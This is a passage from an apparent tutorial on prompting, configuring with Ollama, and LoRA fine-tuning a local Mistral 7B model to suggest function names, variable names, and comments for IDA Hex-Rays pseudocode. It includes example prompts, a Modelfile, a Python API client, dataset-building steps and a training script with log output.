This output is much better: it follows our instructions and produces only a valid JSON structure. However, if we run the same input again, the output varies, returning a slightly different structure along with details outside the JSON:

{
  "function_name": "process_byte_value",
  "comment": "Processes a byte value from the memory location specified by the input parameter and returns the result.",
  "variables": [
    {
      "name": "input_index",
      "type": "int",
      "description": "The index of the byte value to be processed."
    },
    {
      "name": "processed_value",
      "type": "unsigned int",
      "description": "The processed value of the input byte."
    },
    {
      "name": "is_special_condition_met",
      "type": "int",
      "description": "Flag indicating whether a special condition is met or not."
    }
  ]
}

unsigned int process_byte_value(int input_index)
{
  unsigned int processed_value;
  int is_special_condition_met = sub_CE2BC(0);

  processed_value = byte_11A2DC[input_index];

  if (is_special_condition_met)
    processed_value |= 4;

  return processed_value & 0xFFFFFFFD;
}
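
One way to tolerate this failure mode on the client side is to parse only the first JSON object in the reply and treat whatever follows as noise. The following is a minimal sketch using Python's standard json module; the helper name extract_leading_json is our own for illustration and is not part of any tooling discussed here.

```python
import json


def extract_leading_json(response_text):
    """Parse the first JSON object in a reply and return (object, trailing_text)."""
    start = response_text.find("{")
    if start == -1:
        raise ValueError("no JSON object found in response")
    # raw_decode stops at the end of the first complete JSON value and
    # reports the index where parsing ended, so trailing text is tolerated.
    obj, end = json.JSONDecoder().raw_decode(response_text, start)
    return obj, response_text[end:].strip()


reply = (
    '{"function_name": "process_byte_value", "variables": []}\n\n'
    "unsigned int process_byte_value(int input_index) { }"
)
parsed, extra = extract_leading_json(reply)
print(parsed["function_name"])
print("trailing text present:", bool(extra))
```

This does not fix the underlying inconsistency; it only keeps a parser from failing outright when the model appends extra text.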

We could continue down this path, changing the instructions to describe the expected output for a given input, but eventually the response will deviate in some way and break our ability to interface with it programmatically. Instead of trying to describe what we want, we can provide an example of what we want the model to generate (single/multi-shot prompting). An important thing to remember when dealing with an LLM is that it predicts the next token to output based on the current input; by providing an example exchange, you create a pattern for it to follow. The following revised prompt modifies the original to provide a single-shot example:

Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does.
Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters. Do not respond outside the specified JSON structure.
For example, the user will submit code for analysis:

unsigned int __fastcall sub_C1337(int a1,int a2)
{
  int v1;
  unsigned int v2;

  v1 = byte_fff[a1 + a2];
  if ( v1 )
    v2 = v1 + 0xFF
  return v1 & 0xFFFFFFFD * v2;
}

Your response would be:
{
"function_name": "new_function_name",
"comment": "This function uses the arguments a1 and a2 as index into byte_fff, returning a bitwise value based on the result of the called function subCE2BC.",
"variables":[{"original_name":"v1","new_name":"AnalyzedVarName"},"original_name":"v2","new_name":"AnalyzedVarName"}]
}

Analyze the following code:
unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

In this prompt we have provided the instructions as we had previously as well as an example showing what a user would submit and the expected response, followed by the actual code we want analyzed. In this case, the responses match our desired output and are consistent across multiple executions.
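
The same structure (instructions, one worked example, then the real input) can be assembled programmatically. The sketch below is one possible way to do that; build_single_shot_prompt and its parameters are hypothetical names, and serializing the example response with json.dumps is our own choice so that the demonstration shown to the model is always valid JSON.

```python
import json


def build_single_shot_prompt(instructions, example_code, example_response, target_code):
    """Assemble instructions, one example exchange, and the code to analyze."""
    parts = [
        instructions.strip(),
        "For example, the user will submit code for analysis:",
        example_code.strip(),
        "Your response would be:",
        # json.dumps guarantees the example itself is well-formed JSON
        json.dumps(example_response, indent=1),
        "Analyze the following code:",
        target_code.strip(),
    ]
    return "\n\n".join(parts)


example = {
    "function_name": "new_function_name",
    "comment": "Short description of what the function does.",
    "variables": [{"original_name": "v1", "new_name": "AnalyzedVarName"}],
}
prompt = build_single_shot_prompt(
    "Only respond with valid JSON.",
    "int sub_1(int a1) { return a1; }",
    example,
    "int sub_2(int a1) { return a1 + 1; }",
)
print(prompt)
```

Adding further example pairs to the list before the final code turns this into a multi-shot prompt.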

Initial generated response:

{
  "function_name": "checkAndModifyByteValue",
  "comment": "This function uses the argument a1 as an index into byte_11A2DC. If the sub_CE2BC function returns true, the value at that index is modified by setting the 4th bit to 1. The function then returns the original value with the 3 highest bits cleared.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "ModifiedByteValue"
    },
    {
      "original_name": "v2",
      "new_name": "ModifiedByteWithBitSet"
    }
  ]
}

Followup executions:

{
  "function_name": "analyze_byte_from_array_and_apply_condition",
  "comment": "This function uses the argument a1 as index into byte_11A2DC, applies a condition using external function sub_CE2BC, and returns a bitwise value based on the result.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "AnalyzedByte"
    },
    {
      "original_name": "v2",
      "new_name": "ConditionalValue"
    }
  ]
}

{
  "function_name": "newFunctionName",
  "comment": "This function takes an integer argument a1, retrieves a value from the memory location byte\\_11A2DC with the index a1, and if the sub\\_CE2BC function returns true, sets a new variable value to the original value orpped with 4. The final return is a bitwise AND of the original value with 0xFFFFFFFD.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "ResultVar"
    },
    {
      "original_name": "v2",
      "new_name": "ModifiedVar"
    }
  ]
}

{
  "function_name": "checkBitAndModifyByte",
  "comment": "This function uses the argument a1 as an index into byte_11A2DC, checks if sub_CE2BC returns true and modifies the value if it does by setting the 4th bit. It then returns the original value with some bits cleared.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "ByteValue"
    },
    {
      "original_name": "v2",
      "new_name": "ModifiedByte"
    }
  ]
}

The results are decent and do not stray from the format/content we provided in our prompt; we can even include more examples with varying content (multi-shot) if we wanted to. At this point we have a basic prompt that does a specific task that we want relatively well, and the response is parsable (JSON) for automated use.
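
Since the response is meant for automated use, it is worth checking its shape before acting on it. The following is a minimal sketch of such a check, assuming the keys used in our prompt ('function_name', 'comment', 'variables', and 'original_name'/'new_name' for each variable); validate_analysis is a hypothetical helper name.

```python
import json

REQUIRED_KEYS = {"function_name", "comment", "variables"}
VARIABLE_KEYS = {"original_name", "new_name"}


def validate_analysis(raw_response):
    """Parse a model reply and confirm it has the structure the prompt asked for."""
    data = json.loads(raw_response)
    if not isinstance(data, dict):
        raise ValueError("response is not a JSON object")
    missing = REQUIRED_KEYS - set(data)
    if missing:
        raise ValueError(f"missing keys: {sorted(missing)}")
    if not isinstance(data["variables"], list):
        raise ValueError("'variables' must be an array")
    for entry in data["variables"]:
        if not isinstance(entry, dict) or not VARIABLE_KEYS.issubset(entry):
            raise ValueError(f"malformed variable entry: {entry!r}")
    return data


reply = (
    '{"function_name": "checkBitAndModifyByte", "comment": "example", '
    '"variables": [{"original_name": "v1", "new_name": "ByteValue"}]}'
)
print(validate_analysis(reply)["function_name"])
```

A reply that fails this check can simply be regenerated, which is cheap with a local model.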

Light Customization

If you have a specific use case (agent/assistant/task), you can configure a version of the underlying pre-trained weights through Ollama's Modelfile interface. A Modelfile provides a lightweight layer for controlling and configuring precomputed weights, and it can be easily edited and shared with other users. The following example Modelfile is configured for our potential Hex-Rays assistant using the prompt we created:

# defines the base pre-computed weights we want to use
FROM mistral:7b-instruct

# template is the format of the interactions with the model
# this is using templating provided by ollama where .System
# and .Prompt  are replaced with the defined variables 
TEMPLATE "{{ .System }}
[INST]
{{ .Prompt }}
[/INST]
"

# SYSTEM is the prompt/text that the model is started with, there are some special values included within this prompt
# that are described below, for now this is where the prompt we developed earlier goes
SYSTEM """<s>[INST]Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does.
Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters. Do not respond outside the specified JSON structure.
For example, the user will submit code for analysis:

unsigned int __fastcall sub_C1337(int a1,int a2)
{
  int v1;
  unsigned int v2;

  v1 = byte_fff[a1 + a2];
  if ( v1 )
    v2 = v1 + 0xFF
  return v1 & 0xFFFFFFFD * v2;
}

Your response would be:
{
"function_name": "new_function_name",
"comment": "This function uses the arguments a1 and a2 as index into byte_fff, returning a bitwise value based on the result of the called function subCE2BC.",
"variables":[{"original_name":"v1","new_name":"AnalyzedVarName"},"original_name":"v2","new_name":"AnalyzedVarName"}]
}

Analyze the following code:[/INST]
</s>
"""
PARAMETER stop [INST]
PARAMETER stop [/INST]
# these control internal settings within the model to adjust how it behaves
PARAMETER temperature 1.2
PARAMETER top_k 100
PARAMETER top_p 0.09
PARAMETER num_ctx 4096
PARAMETER repeat_last_n 512
PARAMETER repeat_penalty 1.1

To sidetrack for a second: each model has its own required prompt format, along with specific tokens that mark instructions and the start and end of a sequence. These values can be found in the model's tokenizer configuration file (tokenizer_config.json). For instance, Mistral 7B-Instruct (https://huggingface.co/mistralai/Mistral-7B-Instruct-v0.1/blob/main/tokenizer_config.json) defines the special values and format we used in our Modelfile:

{
  ...
  ...
  "bos_token": "<s>",
  "chat_template": "{{ bos_token }}{% for message in messages %}{% if (message['role'] == 'user') != (loop.index0 % 2 == 0) %}{{ raise_exception('Conversation roles must alternate user/assistant/user/assistant/...') }}{% endif %}{% if message['role'] == 'user' %}{{ '[INST] ' + message['content'] + ' [/INST]' }}{% elif message['role'] == 'assistant' %}{{ message['content'] + eos_token + ' ' }}{% else %}{{ raise_exception('Only user and assistant roles are supported!') }}{% endif %}{% endfor %}",
  "clean_up_tokenization_spaces": false,
  "eos_token": "</s>",
  ...
  ...
}

Not all models use the same chat_template structure, beginning-of-sequence (bos_token), or end-of-sequence (eos_token) values, so it is worth understanding where those formats and tokens come from.
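
To make the chat_template above easier to read, here is a plain-Python sketch that mirrors its logic step by step. It is an illustrative re-implementation, not the code Hugging Face or Ollama actually runs, and render_mistral_prompt is a hypothetical name.

```python
def render_mistral_prompt(messages, bos_token="<s>", eos_token="</s>"):
    """Render a list of {'role', 'content'} messages the way the template does."""
    out = bos_token
    for index, message in enumerate(messages):
        # Even positions must be user turns, odd positions assistant turns.
        expected_user = index % 2 == 0
        if (message["role"] == "user") != expected_user:
            raise ValueError(
                "Conversation roles must alternate user/assistant/user/assistant/..."
            )
        if message["role"] == "user":
            out += "[INST] " + message["content"] + " [/INST]"
        elif message["role"] == "assistant":
            out += message["content"] + eos_token + " "
        else:
            raise ValueError("Only user and assistant roles are supported!")
    return out


conversation = [
    {"role": "user", "content": "Analyze this function."},
    {"role": "assistant", "content": "{}"},
    {"role": "user", "content": "Analyze another function."},
]
print(render_mistral_prompt(conversation))
```

Seeing the rendered string makes it clearer why the [INST] and [/INST] markers appear in both the TEMPLATE and the stop parameters of the Modelfile.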

After saving this file to disk (idapal_simple.modelfile), it can be loaded using Ollama:

% ollama create iDAPalSimple -f idapal_simple.modelfile
transferring model data
using existing layer sha256:e8a35b5937a5e6d5c35d1f2a15f161e07eefe5e5bb0a3cdd42998ee79b057730
using existing layer sha256:43070e2d4e532684de521b885f385d0841030efa2b1a20bafb76133a5e1379c1
using existing layer sha256:2af02daf0820d322d7e928bec1d7398090f4679c49c24c67575b5cffa7f08668
creating new layer sha256:cd2ecea3b680dc83a3d3981ec5efcca96c74f7b5794e7008d8f94522bf024f0d
using existing layer sha256:b4f4d07d73c548c4cd652806db6d567ceff891910db2bf5d5410dcc7e76eeb5a
creating new layer sha256:96a6cc4cffa5e48e458c33efa5301f519279a08eb51ae4a9b33e9ac7abce76d9
writing manifest
success

After creation, the new configuration can be tested by entering the interactive mode via the run command and pasting in the previous code:

% ollama run iDAPalSimple
>>> unsigned int __fastcall sub_C385C(int a1)
... {
...   int v1;
...   unsigned int v2;
...
...   v1 = byte_11A2DC[a1];
...   if ( sub_CE2BC(0) )
...     v2 = v1 | 4;
...   return v1 & 0xFFFFFFFD;
... }
{
"function_name": "new_function_name_C385C",
"comment": "This function uses the argument a1 as an index into byte\_11A2DC. It calls sub\_CE2BC with an argument of 0 and sets v2 to the result of
bitwise OR operation between v1 and 4 if sub\_CE2BC returns true. The final return value is obtained by performing a bitwise AND operation between
v1 and 0xFFFFFFFD.",
"variables":[{"original_name":"v1","new_name":"AnalyzedVarName_C385C"},{"original_name":"v2","new_name":"AnalyzedVarName_C385C_v2"}]
}

The observed response shows that the model works and is using the configured system prompt, returning the expected result after being provided only a code block as input. Ollama also provides an API that can be accessed locally (https://github.com/ollama/ollama/blob/main/docs/api.md). It can be used as shown in the following simple Python client:

import json

import requests

def do_analysis(code):
    """Send code to the local Ollama API and return the parsed analysis, or None on failure."""
    url = "http://localhost:11434/api/generate"
    # inform the API we are using our configured model
    payload = {"model": "iDAPalSimple", "prompt": code, "stream": False, "format": "json"}
    # passing json= serializes the payload and sets the Content-Type header
    res = requests.post(url, json=payload)
    raw = res.json().get("response", "")
    try:
        # the model's reply is a JSON document embedded as a string
        return json.loads(raw)
    except json.JSONDecodeError:
        print("error unpacking response")
        print(raw)
        return None


input_code = '''unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}'''

result = do_analysis(input_code)
print(result)

% python simple_analysis.py
{'function_name': 'new_function_name', 'comment': 'This function uses the argument a1 as an index into byte_11A2DC. It calls sub_CE2BC with an argument of 0 and sets v2 to the result of bitwise OR operation between v1 and 4 if sub_CE2BC returns true. The final return value is obtained by performing a bitwise AND operation between v1 and 0xFFFFFFFD.', 'variables': [{'original_name': 'v1', 'new_name': 'AnalyzedVarName1'}, {'original_name': 'v2', 'new_name': 'AnalyzedVarName2'}]}

At this point, the current configuration and simple Python client could be integrated into an IDA Plugin that would work ok, but we can do better.
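
Because run-to-run variation has been a recurring problem, it can also help to pin sampling settings per request. As a sketch, and assuming the options field described in the Ollama API documentation linked above, the request payload can carry a fixed temperature and seed that override the Modelfile values. build_generate_payload is a hypothetical helper, and the specific values are placeholders rather than settings we tested.

```python
def build_generate_payload(model, code, temperature=0.0, seed=42):
    """Build an /api/generate request body with per-request sampling options."""
    return {
        "model": model,
        "prompt": code,
        "stream": False,
        "format": "json",
        # per-request overrides of the PARAMETER values in the Modelfile
        "options": {"temperature": temperature, "seed": seed},
    }


payload = build_generate_payload("iDAPalSimple", "int sub_1(int a1) { return a1; }")
print(payload["options"])
```

The resulting dictionary can be passed as the json argument to requests.post in the client shown earlier.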

Fine-Tuning - step one: draw two circles

The initial training that produces a released set of model weights is computationally expensive, while follow-on fine-tuning is much less expensive to conduct. Fine-tuning provides a path to give a pre-trained model a "personality" by introducing new data and/or example interactions that would be considered "ideal" behavior when interacting with a user. The process is iterative and can be repeated until the model matches the expected behavior.

While our small local model is never going to compete with a large, hosted service, fine-tuning can be used to boost its performance and compete on specific tasks or knowledge domains. To fine-tune a model, you need to complete the following steps:

  • Identify a target knowledge domain
  • Construct a dataset for your target domain
  • Train against your dataset
  • Evaluate trained model

For this task, the knowledge domain is already known: we want to fine-tune a model that can aid with the analysis of Hex-Rays pseudocode. The next step, constructing a dataset, is the difficult part. At a high level, the dataset needs to be made of "instruction-following" examples, such as the following:

{
  "instruction":"Assist the user with a helpful process for drawing an animal.",
  "input":"How do I draw an Owl?",
  "output":"Drawing an Owl is simple, first draw some circles, then you draw the rest of the Owl."
},
{
  "instruction":"Assist the user with an idea for an animal to draw and provide them instructions.",
  "input":"",
  "output":"There are many animals you could choose to draw, my favorite is the Owl. An Owl is a fairly basic animal to draw, first draw some circles, then you draw the rest of the Owl"
}

These examples show two types of instruction-following dataset entries. The first specifies the instruction to be followed, a matching input (user input), and finally the ideal output (generated result). The second provides only an instruction and an example output; this form is useful for generative-only responses that do not require user input. It is not that useful for our current task but is included for completeness. A dataset entry that would be useful for our task looks like the following:

{
  "instruction":"Analyze the following IDA Hex Rays pseudocode and generate a valid JSON object containing the keys 'function_name','comment', and an array 'variables' explaining what the code does, suggest a function name based on the analysis of the code, and new variable names based on the analysis of the code.",
  "input":"unsigned int __fastcall sub_C385C(int a1)\n {\n int v1;\n unsigned int v2;\n\n v1 = byte_11A2DC[a1];\n if ( sub_CE2BC(0) )\n v2 = v1 | 4;\n return v1 & 0xFFFFFFFD;\n }",
  "output":"{'function_name': 'new_function_name', 'comment': 'This function uses the argument a1 as an index into byte_11A2DC. It calls sub_CE2BC with an argument of 0 and sets v2 to the result of bitwise OR operation between v1 and 4 if sub_CE2BC returns true. The final return value is obtained by performing a bitwise AND operation between v1 and 0xFFFFFFFD.', 'variables': [{'original_name': 'v1', 'new_name': 'AnalyzedVarName1'}, {'original_name': 'v2', 'new_name': 'AnalyzedVarName2'}]}"
}

As a side note, this JSON layout is a common format, and following it exactly allows the dataset to be loaded with the datasets library from Hugging Face.
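
As a rough sketch of how such entries could be produced and written to disk, the snippet below builds one record and saves a list of records as a JSON array. The helper names make_record and write_dataset are hypothetical, and serializing the output field with json.dumps (strict JSON with double quotes) is our assumption here, which differs slightly from the single-quoted example above.

```python
import json


def make_record(instruction, stripped_code, analysis):
    """Build one instruction-following entry; the analysis dict becomes a JSON string."""
    return {
        "instruction": instruction,
        "input": stripped_code,
        "output": json.dumps(analysis),
    }


def write_dataset(records, path):
    """Write all records to a single JSON file as an array of objects."""
    with open(path, "w", encoding="utf-8") as handle:
        json.dump(records, handle, indent=2)


record = make_record(
    "Analyze the following IDA Hex Rays pseudocode.",
    "unsigned int __fastcall sub_C385C(int a1) { return a1; }",
    {"function_name": "example_name", "comment": "example", "variables": []},
)
print(record["output"])
```

Keeping the output field as a string rather than a nested object means every entry has the same three string-valued keys, which keeps loading and prompt formatting simple.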

With the exact format needed for training identified, the next problem is that we really need thousands of these examples, ideally with high-quality responses. I had considered manually creating the dataset by using tree-sitter to rewrite valid code with generic variable names while sourcing the function descriptions from documentation, but this sounded painful, and I wanted the machine to do the hard work for me. Looking at earlier work done by Stanford for the Alpaca project (https://crfm.stanford.edu/2023/03/13/alpaca.html), I decided to try the same style of approach. The basic idea of this workflow is to use an LLM to build your dataset from a smaller dataset (or, in this case, an incomplete dataset) and then train against the result.

After some noodling around I came up with the following high-level process:

  • compile libc with full debug/symbol information
  • load the compiled libraries into IDA and export each function's Hex-Rays output into an individual file named by address
  • strip the compiled libraries and repeat the previous step, exporting each function's Hex-Rays output into a new set of files

This process creates two directories with matching files:

/symbol/0x2d7f4.c
/stripp/0x2d7f4.c

In this case the file /symbol/0x2d7f4.c contains:

void __fastcall setname(int category, const char *name)
{
  char *v3; // r0

  v3 = (char *)nl_global_locale.__names[category];
  if ( v3 != name )
  {
    if ( v3 != "C" )
      j___GI___libc_free(v3);
    nl_global_locale.__names[category] = name;
  }
}

And the file /stripp/0x2d7f4.c contains:

char *__fastcall sub_2D7F4(int a1, char **a2)
{
  char *result; // r0

  result = (char *)off_170C10[a1 + 16];
  if ( result != (char *)a2 )
  {
    if ( result != "C" )
      result = (char *)j_free();
    off_170C10[a1 + 16] = a2;
  }
  return result;
}

With the two sets of data, the next stage of processing is to generate the dataset records. At a high level, this process looks like the following:

  • using the previously created mistral-7b configuration, query using the symbol/debug Hex-Rays output to get a reasonable quality output
  • create a dataset entry by combining the matching STRIPPED Hex-Rays output with the generated output from the symbol/debug Hex-Rays
  • iterate over all the files until complete

After completing this step we have a large completed instruction-following dataset we can use to fine tune against.
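
The pairing step described above can be sketched as follows. This is an assumed outline rather than the exact script used for this project: build_dataset is a hypothetical name, and analyze stands for any callable (such as the do_analysis client shown earlier) that takes pseudocode text and returns a dict, or None on failure.

```python
import json
from pathlib import Path


def build_dataset(symbol_dir, stripped_dir, analyze, instruction):
    """Pair each symbol file with its stripped twin and emit dataset records."""
    records = []
    for symbol_file in sorted(Path(symbol_dir).glob("*.c")):
        stripped_file = Path(stripped_dir) / symbol_file.name
        if not stripped_file.exists():
            continue  # no matching stripped export for this address
        # Query the model with the symbol-rich pseudocode for a better answer.
        analysis = analyze(symbol_file.read_text())
        if analysis is None:
            continue  # skip functions where the model reply could not be parsed
        records.append({
            "instruction": instruction,
            # The training input is the STRIPPED pseudocode.
            "input": stripped_file.read_text(),
            "output": json.dumps(analysis),
        })
    return records
```

Skipping unparsable replies trades dataset size for quality, which seems reasonable given that the generated answers are already only approximately correct.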

Heavy Customization

There are quite a few options when it comes to fine-tuning an LLM; at the time of this research project I chose to use unsloth. Other popular projects exist and are most likely more batteries-included.

I went with unsloth for a few reasons. The main one is that the underlying code has been tuned to provide a large performance increase (speed/memory usage); it also seemed less likely to abstract away or hide parts of the training process that may be useful to see or understand. The unsloth project also provides a Jupyter notebook that can be executed on the Google Colab free tier if you do not have the hardware (works perfectly!). I ended up conducting training on a local Linux host with an NVIDIA 3090. To give an idea of performance, the free Colab tier took 21 minutes, while my 3090 executed the same training in 7 minutes. Refer to the unsloth repository for install instructions; at the time of this project, the installation using conda looked like the following:

conda create --name unsloth_env python=3.10
conda activate unsloth_env
conda install cudatoolkit xformers bitsandbytes pytorch pytorch-cuda=12.1 -c pytorch -c nvidia -c xformers -c conda-forge -y
pip install "unsloth[conda] @ git+https://github.com/unslothai/unsloth.git"

The script used for training was adapted from the examples provided by unsloth. It uses Hugging Face's Supervised Fine-tuning Trainer (SFT) from the Transformer Reinforcement Learning (TRL) library:

from unsloth import FastLanguageModel
import torch,sys

model = sys.argv[1]
steps = int(sys.argv[2])
training_data = sys.argv[3]

max_seq_length = 4096 # Choose any! We auto support RoPE Scaling internally!
dtype = None # None for auto detection. Float16 for Tesla T4, V100, Bfloat16 for Ampere+
load_in_4bit = True # Use 4bit quantization to reduce memory usage. Can be False.

model, tokenizer = FastLanguageModel.from_pretrained(
    #model_name = "unsloth/mistral-7b-instruct-v0.2-bnb-4bit", # Choose ANY! eg teknium/OpenHermes-2.5-Mistral-7B
    model_name = model,
    max_seq_length = max_seq_length,
    dtype = dtype,
    load_in_4bit = load_in_4bit,
)

model = FastLanguageModel.get_peft_model(
    model,
    r = 32, # Choose any number > 0 ! Suggested 8, 16, 32, 64, 128 - r is the rank of the LoRA update matrices; a higher rank adds more trainable parameters
    target_modules = ["q_proj", "k_proj", "v_proj", "o_proj",
                      "gate_proj", "up_proj", "down_proj",],
    lora_alpha = 16, # scaling factor; the LoRA update is scaled by lora_alpha / r
    lora_dropout = 0, # Supports any, but = 0 is optimized
    bias = "none",    # Supports any, but = "none" is optimized
    use_gradient_checkpointing = True,
    random_state = 3407,
    use_rslora = False,  # We support rank stabilized LoRA
    loftq_config = None, # And LoftQ
)

alpaca_prompt = """Below is an instruction that describes a task, paired with an input that provides further context. Write a response that appropriately completes the request.

### Instruction:
{}

### Input:
{}

### Response:
{}"""

EOS_TOKEN = tokenizer.eos_token # Must add EOS_TOKEN
def formatting_prompts_func(examples):
    instructions = examples["instruction"]
    inputs       = examples["input"]
    outputs      = examples["output"]
    texts = []
    for instruction, input, output in zip(instructions, inputs, outputs):
        # Must add EOS_TOKEN, otherwise your generation will go on forever!
        text = alpaca_prompt.format(instruction, input, output) + EOS_TOKEN
        texts.append(text)
    return { "text" : texts, }
pass

#load and convert the dataset into the prompt format
from datasets import load_dataset
dataset = load_dataset("json", data_files=training_data, split = "train")
dataset = dataset.map(formatting_prompts_func, batched = True,)


from trl import SFTTrainer
from transformers import TrainingArguments

trainer = SFTTrainer(
    model = model,
    tokenizer = tokenizer,
    train_dataset = dataset,
    dataset_text_field = "text",
    max_seq_length = max_seq_length,
    dataset_num_proc = 2,
    packing = False, # Can make training 5x faster for short sequences.
    args = TrainingArguments(
        per_device_train_batch_size = 4,
        gradient_accumulation_steps = 4,
        warmup_steps = 5,
        max_steps = steps,
        learning_rate = 2e-4,
        fp16 = not torch.cuda.is_bf16_supported(),
        bf16 = torch.cuda.is_bf16_supported(),
        logging_steps = 1,
        optim = "adamw_8bit",
        weight_decay = 0.01,
        lr_scheduler_type = "linear",
        seed = 3407,
        output_dir = "outputs",
        save_strategy= "steps",
        save_steps=50
    ),
)

gpu_stats = torch.cuda.get_device_properties(0)
start_gpu_memory = round(torch.cuda.max_memory_reserved() / 1024 / 1024 / 1024, 3)
max_memory = round(gpu_stats.total_memory / 1024 / 1024 / 1024, 3)
print(f"GPU = {gpu_stats.name}. Max memory = {max_memory} GB.")
print(f"{start_gpu_memory} GB of memory reserved.")

# execute the actual training
trainer_stats = trainer.train()

used_memory = round(torch.cuda.max_memory_reserved() / 1024 / 1024 / 1024, 3)
used_memory_for_lora = round(used_memory - start_gpu_memory, 3)
used_percentage = round(used_memory         /max_memory*100, 3)
lora_percentage = round(used_memory_for_lora/max_memory*100, 3)
print(f"{trainer_stats.metrics['train_runtime']} seconds used for training.")
print(f"{round(trainer_stats.metrics['train_runtime']/60, 2)} minutes used for training.")
print(f"Peak reserved memory = {used_memory} GB.")
print(f"Peak reserved memory for training = {used_memory_for_lora} GB.")
print(f"Peak reserved memory % of max memory = {used_percentage} %.")
print(f"Peak reserved memory for training % of max memory = {lora_percentage} %.")

model.save_pretrained(f"lora_model_{steps}") # Local saving

# Just LoRA adapters
if True: model.save_pretrained_merged(f"model_{steps}", tokenizer, save_method = "lora",)

# Save to q4_k_m GGUF
if True: model.save_pretrained_gguf(f"model_{steps}", tokenizer, quantization_method = "q4_k_m")
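
To get a feel for what r = 32 means in practice, the number of trainable LoRA parameters can be estimated by hand: each adapted weight matrix of shape (d_in, d_out) gains two small matrices holding r * (d_in + d_out) values. The sketch below works this out under the assumption that the base model uses the published Mistral 7B dimensions (hidden size 4096, MLP size 14336, key/value projection size 1024, 32 layers); the function name and shape table are ours for illustration.

```python
def lora_trainable_params(rank, layers, module_shapes):
    """Count LoRA parameters: rank * (d_in + d_out) per adapted matrix, per layer."""
    per_layer = sum(rank * (d_in + d_out) for d_in, d_out in module_shapes.values())
    return per_layer * layers


# Assumed (d_in, d_out) shapes for the seven target_modules in Mistral 7B.
MISTRAL_7B_SHAPES = {
    "q_proj": (4096, 4096),
    "k_proj": (4096, 1024),
    "v_proj": (4096, 1024),
    "o_proj": (4096, 4096),
    "gate_proj": (4096, 14336),
    "up_proj": (4096, 14336),
    "down_proj": (14336, 4096),
}

print(lora_trainable_params(32, 32, MISTRAL_7B_SHAPES))  # 83886080
```

That is roughly 84 million trainable values against a base model of about 7 billion, which is why this style of fine-tuning fits on a single consumer GPU.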

The script also sets the following checkpoint options:

output_dir = "outputs",
save_strategy = "steps",
save_steps = 50

This configuration saves a copy of the fine-tuned weights to the outputs directory every 50 steps, which is helpful for two reasons. First, if an error occurs at some point (crash, power loss, etc.), you have checkpoints from which you can restart training. Second, it allows you to evaluate how well training is working by comparing the saved checkpoints. While it may seem at first that more steps are always better, the right number depends on how large your dataset is and which settings you have configured; more is not always better.
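
A quick way to reason about how many steps are appropriate is to convert steps into passes over the dataset. The sketch below is an approximation (the Trainer's own rounding differs slightly) and uses the 2,897 examples and total batch size of 16 reported in the training log later in this post; steps_to_epochs is a hypothetical helper.

```python
import math


def steps_to_epochs(steps, num_examples, per_device_batch, grad_accum, num_gpus=1):
    """Approximate how many passes over the dataset a given step count represents."""
    effective_batch = per_device_batch * grad_accum * num_gpus
    steps_per_epoch = math.ceil(num_examples / effective_batch)
    return steps / steps_per_epoch


print(round(steps_to_epochs(100, 2897, 4, 4), 2))  # 0.55
print(round(steps_to_epochs(500, 2897, 4, 4), 2))  # 2.75
```

With these settings, 100 steps covers a little over half of the dataset once, while 500 steps revisits every example almost three times, which is where overfitting to the generated answers becomes a real possibility.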

Running this script to fine-tune mistral-7b-instruct for 100 steps using the dataset we created produces output like the following:

$ python training/train.py unsloth/mistral-7b-instruct-v0.2-bnb-4bit 100 ./dataset.json
==((====))==  Unsloth: Fast Mistral patching release 2024.2
   \\   /|    GPU: NVIDIA GeForce RTX 3090. Max memory: 23.691 GB. Platform = Linux.
O^O/ \_/ \    Pytorch: 2.2.0. CUDA = 8.6. CUDA Toolkit = 12.1.
\        /    Bfloat16 = TRUE. Xformers = 0.0.24. FA = False.
 "-____-"     Free Apache license: http://github.com/unslothai/unsloth
/mnt/new/unsloth/lib/python3.10/site-packages/transformers/quantizers/auto.py:155: UserWarning: You passed `quantization_config` or equivalent parameters to `from_pretrained` but the model you're loading already has a `quantization_config` attribute. The `quantization_config` from the model will be used.
  warnings.warn(warning_msg)
Unsloth 2024.2 patched 32 layers with 32 QKV layers, 32 O layers and 32 MLP layers.
Detected kernel version 5.4.0, which is below the recommended minimum of 5.5.0; this can cause the process to hang. It is recommended to upgrade the kernel to the minimum version or higher.
GPU = NVIDIA GeForce RTX 3090. Max memory = 23.691 GB.
4.676 GB of memory reserved.
==((====))==  Unsloth - 2x faster free finetuning | Num GPUs = 1
   \\   /|    Num examples = 2,897 | Num Epochs = 3
O^O/ \_/ \    Batch size per device = 4 | Gradient Accumulation steps = 4
\        /    Total batch size = 16 | Total steps = 500
 "-____-"     Number of trainable parameters = 83,886,080
{'loss': 1.4802, 'grad_norm': 1.6030948162078857, 'learning_rate': 4e-05, 'epoch': 0.01}
{'loss': 1.4201, 'grad_norm': 1.4948327541351318, 'learning_rate': 8e-05, 'epoch': 0.01}
{'loss': 1.5114, 'grad_norm': 1.6689960956573486, 'learning_rate': 0.00012, 'epoch': 0.02}
{'loss': 1.1665, 'grad_norm': 0.9258238673210144, 'learning_rate': 0.00016, 'epoch': 0.02}
{'loss': 0.9282, 'grad_norm': 0.6133134961128235, 'learning_rate': 0.0002, 'epoch': 0.03}
{'loss': 0.9292, 'grad_norm': 0.6610234975814819, 'learning_rate': 0.0001995959595959596, 'epoch': 0.03}
{'loss': 0.7517, 'grad_norm': 0.4809339940547943, 'learning_rate': 0.0001991919191919192, 'epoch': 0.04}
{'loss': 0.7554, 'grad_norm': 0.6171303987503052, 'learning_rate': 0.00019878787878787878, 'epoch': 0.04}
{'loss': 0.606, 'grad_norm': 0.564286470413208, 'learning_rate': 0.00019838383838383837, 'epoch': 0.05}
